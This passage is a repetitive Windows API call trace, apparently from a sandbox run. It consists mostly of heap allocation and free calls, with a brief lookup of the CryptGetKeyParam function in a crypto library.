Flags=0x0, Size=0x14) returned 0x90d480 [0195.877] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2638 [0195.878] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8defd8 [0195.878] CharLowerBuffW (in: lpsz="uint;dword", cchLength=0xa | out: lpsz="uint;dword") returned 0xa [0195.878] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x44) returned 0x9aa548 [0195.878] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd600 [0195.878] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c27a8 [0195.878] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd540 [0195.878] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c28e8 [0195.878] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd6f0 [0195.878] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2768 [0195.878] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba000 [0195.878] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c28a8 [0195.878] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd3a8 [0195.878] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c27e8 [0195.878] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd3a8 | out: hHeap=0x8a0000) returned 1 [0195.878] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c27e8 | out: hHeap=0x8a0000) returned 1 [0195.878] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba000 | out: hHeap=0x8a0000) returned 1 [0195.878] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c28a8 | out: hHeap=0x8a0000) returned 1 [0195.878] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd6f0 | out: hHeap=0x8a0000) returned 1 [0195.878] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2768 | out: hHeap=0x8a0000) returned 1 [0195.878] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2768 [0195.878] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c28a8 [0195.878] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8defd8 | out: hHeap=0x8a0000) returned 1 [0195.879] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2638 | out: hHeap=0x8a0000) returned 1 [0195.879] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd780 | out: hHeap=0x8a0000) returned 1 [0195.879] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba2e8 | out: hHeap=0x8a0000) returned 1 [0195.879] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8deee8 | out: hHeap=0x8a0000) returned 1 [0195.879] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2668 | out: hHeap=0x8a0000) returned 1 [0195.879] PeekMessageW (in: lpMsg=0x87e924, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87e924) returned 0 [0195.879] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8deee8 [0195.879] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba2e8 [0195.879] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2668 [0195.879] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x14) returned 0x90d420 [0195.879] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x44) returned 0x9aa4f8 [0195.879] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd780 [0195.879] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2638 [0195.879] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd6f0 [0195.879] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c27e8 [0195.879] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2668 | out: hHeap=0x8a0000) returned 1 [0195.879] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba000 [0195.879] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2668 [0195.879] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2668 | out: hHeap=0x8a0000) returned 1 [0195.879] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd3a8 [0195.879] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2668 [0195.879] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2668 | out: hHeap=0x8a0000) returned 1 [0195.879] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd6f0 | out: hHeap=0x8a0000) returned 1 [0195.880] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c27e8 | out: hHeap=0x8a0000) returned 1 [0195.880] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd780 | out: hHeap=0x8a0000) returned 1 [0195.880] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2638 | out: hHeap=0x8a0000) returned 1 [0195.880] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9aa4f8 | out: hHeap=0x8a0000) returned 1 [0195.880] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x90d420 | out: hHeap=0x8a0000) returned 1 [0195.880] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba2e8 | out: hHeap=0x8a0000) returned 1 [0195.880] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba000 | out: hHeap=0x8a0000) returned 1 [0195.880] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd3a8 | out: hHeap=0x8a0000) returned 1 [0195.880] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8deee8 | out: hHeap=0x8a0000) returned 1 [0195.880] PeekMessageW (in: lpMsg=0x87e924, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87e924) returned 0 [0195.880] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8deee8 [0195.880] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd3a8 [0195.880] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2638 [0195.880] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba000 [0195.880] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba2e8 [0195.880] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c27e8 [0195.880] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba2e8 | out: hHeap=0x8a0000) returned 1 [0195.880] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8defd8 [0195.880] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba2e8 [0195.880] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2668 [0195.881] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c26e8 [0195.881] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x30) returned 0x9bf380 [0195.881] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0195.881] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bf380 | out: hHeap=0x8a0000) returned 1 [0195.881] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c26e8 | out: hHeap=0x8a0000) returned 1 [0195.881] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0xc) returned 0x9bd780 [0195.881] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x40) returned 0x8db408 [0195.881] PeekMessageW (in: lpMsg=0x87e2d4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87e2d4) returned 0 [0195.881] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c26e8 [0195.881] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2818 [0195.881] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2818 | out: hHeap=0x8a0000) returned 1 [0195.881] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c26e8 | out: hHeap=0x8a0000) returned 1 [0195.881] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8db408 | out: hHeap=0x8a0000) returned 1 [0195.881] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd780 | out: hHeap=0x8a0000) returned 1 [0195.881] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2668 | out: hHeap=0x8a0000) returned 1 [0195.881] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd780 [0195.881] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2668 [0195.881] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd6f0 [0195.881] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2668 | out: hHeap=0x8a0000) returned 1 [0195.881] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba0f0 [0195.881] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2668 [0195.881] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bda80 [0195.882] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2668 | out: hHeap=0x8a0000) returned 1 [0195.882] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba078 [0195.882] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2668 [0195.882] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba378 [0195.882] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2668 | out: hHeap=0x8a0000) returned 1 [0195.882] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd750 [0195.882] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2668 [0195.882] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2668 | out: hHeap=0x8a0000) returned 1 [0195.882] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd3f0 [0195.882] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2668 [0195.882] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bda20 [0195.882] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2668 | out: hHeap=0x8a0000) returned 1 [0195.882] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd570 [0195.882] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2668 [0195.882] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2668 | out: hHeap=0x8a0000) returned 1 [0195.882] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd738 [0195.882] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2668 [0195.882] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba4f8 [0195.882] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2668 | out: hHeap=0x8a0000) returned 1 [0195.883] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x40) returned 0x8db408 [0195.883] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8defd8 | out: hHeap=0x8a0000) returned 1 [0195.883] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9a90 [0195.883] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2668 [0195.883] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8defd8 [0195.883] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bda68 [0195.883] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c26e8 [0195.883] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x14) returned 0x90d420 [0195.883] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x44) returned 0x9aa4f8 [0195.883] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd828 [0195.883] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2818 [0195.883] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd888 [0195.883] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c27c8 [0195.883] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c26e8 | out: hHeap=0x8a0000) returned 1 [0195.883] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd378 [0195.883] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c26e8 [0195.883] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c26e8 | out: hHeap=0x8a0000) returned 1 [0195.883] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd888 | out: hHeap=0x8a0000) returned 1 [0195.883] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c27c8 | out: hHeap=0x8a0000) returned 1 [0195.883] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd828 | out: hHeap=0x8a0000) returned 1 [0195.883] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2818 | out: hHeap=0x8a0000) returned 1 [0195.883] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9aa4f8 | out: hHeap=0x8a0000) returned 1 [0195.884] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x90d420 | out: hHeap=0x8a0000) returned 1 [0195.884] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bda68 | out: hHeap=0x8a0000) returned 1 [0195.884] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd378 | out: hHeap=0x8a0000) returned 1 [0195.884] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8defd8 | out: hHeap=0x8a0000) returned 1 [0195.884] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2668 | out: hHeap=0x8a0000) returned 1 [0195.884] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd378 [0195.884] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2668 [0195.884] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bda68 [0195.884] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2668 | out: hHeap=0x8a0000) returned 1 [0195.884] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd828 [0195.884] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2668 [0195.884] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8defd8 [0195.884] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd888 [0195.884] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2818 [0195.884] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x14) returned 0x90d420 [0195.884] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x44) returned 0x9aa4f8 [0195.884] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd420 [0195.884] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c27c8 [0195.884] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd708 [0195.884] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c26e8 [0195.884] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2818 | out: hHeap=0x8a0000) returned 1 [0195.884] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd990 [0195.885] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2818 [0195.885] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2818 | out: hHeap=0x8a0000) returned 1 [0195.885] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd708 | out: hHeap=0x8a0000) returned 1 [0195.885] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c26e8 | out: hHeap=0x8a0000) returned 1 [0195.885] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd420 | out: hHeap=0x8a0000) returned 1 [0195.885] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c27c8 | out: hHeap=0x8a0000) returned 1 [0195.885] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9aa4f8 | out: hHeap=0x8a0000) returned 1 [0195.885] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x90d420 | out: hHeap=0x8a0000) returned 1 [0195.885] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd888 | out: hHeap=0x8a0000) returned 1 [0195.885] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd990 | out: hHeap=0x8a0000) returned 1 [0195.885] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8defd8 | out: hHeap=0x8a0000) returned 1 [0195.885] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2668 | out: hHeap=0x8a0000) returned 1 [0195.885] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd990 [0195.885] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2668 [0195.885] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd888 [0195.885] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2668 | out: hHeap=0x8a0000) returned 1 [0195.885] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd420 [0195.885] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2668 [0195.885] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2668 | out: hHeap=0x8a0000) returned 1 [0195.885] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2668 [0195.885] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd708 [0195.885] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0195.885] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba1c8 [0195.886] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c27c8 [0195.886] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c26e8 [0195.886] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bda38 [0195.886] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba1c8 | out: hHeap=0x8a0000) returned 1 [0195.886] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c27c8 | out: hHeap=0x8a0000) returned 1 [0195.886] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bda38 | out: hHeap=0x8a0000) returned 1 [0195.886] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c26e8 | out: hHeap=0x8a0000) returned 1 [0195.886] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8defd8 [0195.886] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c26e8 [0195.886] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bda38 [0195.886] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c27c8 [0195.886] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2818 [0195.886] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba1c8 [0195.886] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bda38 | out: hHeap=0x8a0000) returned 1 [0195.886] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c27c8 | out: hHeap=0x8a0000) returned 1 [0195.886] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba1c8 | out: hHeap=0x8a0000) returned 1 [0195.886] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2818 | out: hHeap=0x8a0000) returned 1 [0195.886] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2818 [0195.886] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba1c8 [0195.886] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c27c8 [0195.886] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2778 [0195.886] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bda38 [0195.887] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba1c8 | out: hHeap=0x8a0000) returned 1 [0195.887] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c27c8 | out: hHeap=0x8a0000) returned 1 [0195.887] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bda38 | out: hHeap=0x8a0000) returned 1 [0195.887] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2778 | out: hHeap=0x8a0000) returned 1 [0195.887] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2778 [0195.887] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bda38 [0195.887] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c27c8 [0195.887] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c26f8 [0195.887] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba1c8 [0195.887] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bda38 | out: hHeap=0x8a0000) returned 1 [0195.887] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c27c8 | out: hHeap=0x8a0000) returned 1 [0195.887] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba1c8 | out: hHeap=0x8a0000) returned 1 [0195.887] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c26f8 | out: hHeap=0x8a0000) returned 1 [0195.887] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c26f8 [0195.887] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba1c8 [0195.887] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c27c8 [0195.887] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2828 [0195.887] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bda38 [0195.887] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba1c8 | out: hHeap=0x8a0000) returned 1 [0195.887] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c27c8 | out: hHeap=0x8a0000) returned 1 [0195.887] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bda38 | out: hHeap=0x8a0000) returned 1 [0195.888] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2828 | out: hHeap=0x8a0000) returned 1 [0195.888] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2828 [0195.888] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bda38 [0195.888] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c27c8 [0195.888] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2868 [0195.888] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba1c8 [0195.888] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bda38 | out: hHeap=0x8a0000) returned 1 [0195.888] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c27c8 | out: hHeap=0x8a0000) returned 1 [0195.888] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba1c8 | out: hHeap=0x8a0000) returned 1 [0195.888] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2868 | out: hHeap=0x8a0000) returned 1 [0195.888] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba1c8 [0195.888] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2868 [0195.888] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptGetKeyParam", cchWideChar=17, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 17 [0195.888] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x11) returned 0x90d420 [0195.888] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptGetKeyParam", cchWideChar=17, lpMultiByteStr=0x90d420, cbMultiByte=17, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptGetKeyParam", lpUsedDefaultChar=0x0) returned 17 [0195.888] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba1c8 | out: hHeap=0x8a0000) returned 1 [0195.888] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8df078 [0195.888] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x90d420 | out: hHeap=0x8a0000) returned 1 [0195.889] GetProcAddress (hModule=0x74f20000, lpProcName="CryptGetKeyParam") returned 0x74f477cb [0195.889] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8df078 | out: hHeap=0x8a0000) returned 1 [0195.889] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2868 | out: hHeap=0x8a0000) returned 1 [0195.889] RtlAllocateHeap 